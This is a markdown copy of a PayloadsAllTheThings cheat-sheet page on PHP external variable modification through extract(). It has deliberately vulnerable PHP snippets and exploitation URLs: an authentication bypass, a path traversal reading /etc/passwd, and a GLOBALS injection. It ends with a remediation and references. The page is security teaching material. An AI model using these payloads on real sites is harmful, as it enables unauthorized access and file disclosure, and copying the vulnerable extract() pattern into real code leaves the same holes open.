index.md (4043B)
1 --- 2 title: "External Variable Modification" 3 topic: "External Variable Modification" 4 topicSlug: "external-variable-modification" 5 sourcePath: "External Variable Modification/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/External%20Variable%20Modification/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # External Variable Modification 12 13 > External Variable Modification Vulnerability occurs when a web application improperly handles user input, allowing attackers to overwrite internal variables. In PHP, functions like extract($_GET), extract($_POST), or import_request_variables() can be abused if they import user-controlled data into the global scope without proper validation. This can lead to security issues such as unauthorized changes to application logic, privilege escalation, or bypassing security controls. 14 15 ## Summary 16 17 * [Methodology](#methodology) 18 * [Overwriting Critical Variables](#overwriting-critical-variables) 19 * [Poisoning File Inclusion](#poisoning-file-inclusion) 20 * [Global Variable Injection](#global-variable-injection) 21 * [Remediations](#remediations) 22 * [References](#references) 23 24 ## Methodology 25 26 The `extract()` function in PHP imports variables from an array into the current symbol table. While it may seem convenient, it can introduce serious security risks, especially when handling user-supplied data. 27 28 * It allows overwriting existing variables. 29 * It can lead to **variable pollution**, impacting security mechanisms. 30 * It can be used as a **gadget** to trigger other vulnerabilities like Remote Code Execution (RCE) and Local File Inclusion (LFI). 31 32 By default, `extract()` uses `EXTR_OVERWRITE`, meaning it **replaces existing variables** if they share the same name as keys in the input array. 33 34 ### Overwriting Critical Variables 35 36 If `extract()` is used in a script that relies on specific variables, an attacker can manipulate them. 37 38 ```php 39 <?php 40 $authenticated = false; 41 extract($_GET); 42 if ($authenticated) { 43 echo "Access granted!"; 44 } else { 45 echo "Access denied!"; 46 } 47 ?> 48 ``` 49 50 **Exploitation:** 51 52 In this example, the use of `extract($_GET)` allow an attacker to set the `$authenticated` variable to `true`: 53 54 ```ps1 55 http://example.com/vuln.php?authenticated=true 56 http://example.com/vuln.php?authenticated=1 57 ``` 58 59 ### Poisoning File Inclusion 60 61 If `extract()` is combined with file inclusion, attackers can control file paths. 62 63 ```php 64 <?php 65 $page = "config.php"; 66 extract($_GET); 67 include "$page"; 68 ?> 69 ``` 70 71 **Exploitation:** 72 73 ```ps1 74 http://example.com/vuln.php?page=../../etc/passwd 75 ``` 76 77 ### Global Variable Injection 78 79 :warning: As of PHP 8.1.0, write access to the entire `$GLOBALS` array is no longer supported. 80 81 Overwriting `$GLOBALS` when an application calls `extract` function on untrusted value: 82 83 ```php 84 extract($_GET); 85 ``` 86 87 An attacker can manipulate **global variables**: 88 89 ```ps1 90 http://example.com/vuln.php?GLOBALS[admin]=1 91 ``` 92 93 ## Remediations 94 95 Use `EXTR_SKIP` to prevent overwriting: 96 97 ```php 98 extract($_GET, EXTR_SKIP); 99 ``` 100 101 ## References 102 103 * [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://web.archive.org/web/20260210044429/https://cwe.mitre.org/data/definitions/473.html) 104 * [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://web.archive.org/web/20260223131419/https://cwe.mitre.org/data/definitions/621.html) 105 * [Function extract - PHP Documentation - March 21, 2001](https://web.archive.org/web/20260210044429/https://www.php.net/manual/en/function.extract.php) 106 * [$GLOBALS variables - PHP Documentation - April 30, 2008](https://web.archive.org/web/20260307071107/https://www.php.net/manual/en/reserved.variables.globals.php) 107 * [The Ducks - HackThisSite - December 14, 2016](https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md) 108 * [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://web.archive.org/web/20250709004721/https://ctftime.org/writeup/38076)